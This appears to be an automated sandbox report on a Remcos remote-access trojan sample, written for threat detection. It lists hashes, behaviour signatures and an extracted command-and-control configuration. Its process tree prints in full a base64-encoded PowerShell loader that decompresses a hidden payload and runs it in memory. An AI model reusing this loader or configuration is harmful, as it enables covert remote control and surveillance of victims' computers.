Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/04/2024, 13:21

General

  • Target

    SecuriteInfo.com.Script.SNH-gen.32117.31795.exe

  • Size

    515KB

  • MD5

    3e1fb053e8ca0281a2952fbdced68d1e

  • SHA1

    0af4262bd9b8b2ac335a27aac5211d6242d14884

  • SHA256

    a964f632cb0e524f5f7784a1b99da4bbde98216128e74713eb12851b83073075

  • SHA512

    498683b0aa74a335372810d25f6b4456264b3fff17536822ee24adbc560d5932601420c942e4a1dfbf800397c864300fffb14e89b620217321d857f6b0d40cf9

  • SSDEEP

    12288:1fLwLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLPLLLLLLLLLL2:1fLwLLLLLLLLLLLLLLLLLLLLLLLLLLL6

Score
10/10

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

172.94.101.172:6238

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-ZY6SQA

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Script.SNH-gen.32117.31795.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Script.SNH-gen.32117.31795.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4304
    • C:\Windows\SysWOW64\wscript.exe
      "wscript.exe" "C:\Users\Admin\start.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2900
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1708
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENOViAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgImNzZy5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\csg.ps1' -Encoding UTF8"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3272
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\csg.ps1"
          4⤵
          • Drops startup file
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1240
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
            5⤵
              PID:2644

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

            Filesize

            1KB

            MD5

            4280e36a29fa31c01e4d8b2ba726a0d8

            SHA1

            c485c2c9ce0a99747b18d899b71dfa9a64dabe32

            SHA256

            e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

            SHA512

            494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            16KB

            MD5

            e46aa8cd6df9a7b75e115fa3aaf0b33c

            SHA1

            725d6e889eef3906e709890b288cb943052d0051

            SHA256

            dee5f48bd8eb29936eb69fa95c6405d148833d186e33f1cb10f3766b2f78c3b6

            SHA512

            da5e14449508f4852b0cabfb896312be81300101752d1d8901fc1316fce1dd860141d92c99e4f199b42a888cf9df48eb5418a164bc30230103c1cb2638b9735a

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jhevcbkr.1vr.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\csg.ps1

            Filesize

            2KB

            MD5

            6a305fb87021b075b47a44410458b25e

            SHA1

            9607955e06d79187ebc350df3c4f5468e1b97b45

            SHA256

            40ac09ba5daa614c666e524e6a31369296a718f8eb1117ea46837a1d97091c50

            SHA512

            670d1690aca73d03495d788547eed6f287afa7938f11d5d450519e77efb3b4d2ba340868521c9a22906cecd230a653013df0b93b2094ab822d995be588260fea

          • C:\Users\Admin\start.vbs

            Filesize

            170B

            MD5

            65ee9f906fdefca9b4a6a21581dd849f

            SHA1

            b372dea5a9b9a99311445a55b634aa8f6c1d7b9d

            SHA256

            087f43e7f9f78bbeb1050cdbfaeb3d23ad7b4b742d6ef91229b8824a20daaee6

            SHA512

            1f593864f52ac61f7f4ef2aa1bfcf538dd2833e53bbd931f96c42b2ca90d2bf68545fdac547f0f3cce09ad7734acdb629bf642081227a996d3d22117263ad23a

          • C:\Users\Admin\temp.bat

            Filesize

            518KB

            MD5

            2667b4a8172dd90357d7fb381b1bd5d2

            SHA1

            7e97cca9d3f29238ca92085405dd477d3323a6f0

            SHA256

            c8ac67ae12680fa0dbfe31a8c76793de12f3ef74f1c5e1f47785f7e5828dd364

            SHA512

            bdc8954bc23adfe40ce7cd21bb0ecc48a9ea94df170e5f22797c80aef8b5eceabf0d7d69f3d2e3f6d73b7aa77a5b5fef94113fb644394625f18b7d8968997013

          • memory/1240-33-0x0000000005FE0000-0x0000000006334000-memory.dmp

            Filesize

            3.3MB

          • memory/1240-45-0x0000000007620000-0x00000000076B6000-memory.dmp

            Filesize

            600KB

          • memory/1240-47-0x0000000007EC0000-0x0000000008464000-memory.dmp

            Filesize

            5.6MB

          • memory/1240-51-0x0000000002DB0000-0x0000000002DBA000-memory.dmp

            Filesize

            40KB

          • memory/1240-49-0x00000000079E0000-0x0000000007A9C000-memory.dmp

            Filesize

            752KB

          • memory/1240-46-0x0000000006BC0000-0x0000000006BE2000-memory.dmp

            Filesize

            136KB

          • memory/2644-58-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-61-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-68-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-67-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-66-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-65-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-64-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-63-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-62-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-60-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-59-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-52-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-57-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-56-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-55-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2644-54-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/3272-25-0x0000000005BF0000-0x0000000005C3C000-memory.dmp

            Filesize

            304KB

          • memory/3272-27-0x0000000006C90000-0x0000000006CAA000-memory.dmp

            Filesize

            104KB

          • memory/3272-13-0x0000000005690000-0x00000000056F6000-memory.dmp

            Filesize

            408KB

          • memory/3272-9-0x0000000004940000-0x0000000004950000-memory.dmp

            Filesize

            64KB

          • memory/3272-12-0x0000000005620000-0x0000000005686000-memory.dmp

            Filesize

            408KB

          • memory/3272-8-0x0000000004830000-0x0000000004866000-memory.dmp

            Filesize

            216KB

          • memory/3272-23-0x0000000005700000-0x0000000005A54000-memory.dmp

            Filesize

            3.3MB

          • memory/3272-10-0x0000000004F80000-0x00000000055A8000-memory.dmp

            Filesize

            6.2MB

          • memory/3272-11-0x0000000004E10000-0x0000000004E32000-memory.dmp

            Filesize

            136KB

          • memory/3272-24-0x0000000005BC0000-0x0000000005BDE000-memory.dmp

            Filesize

            120KB

          • memory/3272-6-0x0000000074950000-0x0000000075100000-memory.dmp

            Filesize

            7.7MB

          • memory/3272-31-0x0000000074950000-0x0000000075100000-memory.dmp

            Filesize

            7.7MB

          • memory/3272-7-0x0000000004940000-0x0000000004950000-memory.dmp

            Filesize

            64KB

          • memory/3272-26-0x00000000074F0000-0x0000000007B6A000-memory.dmp

            Filesize

            6.5MB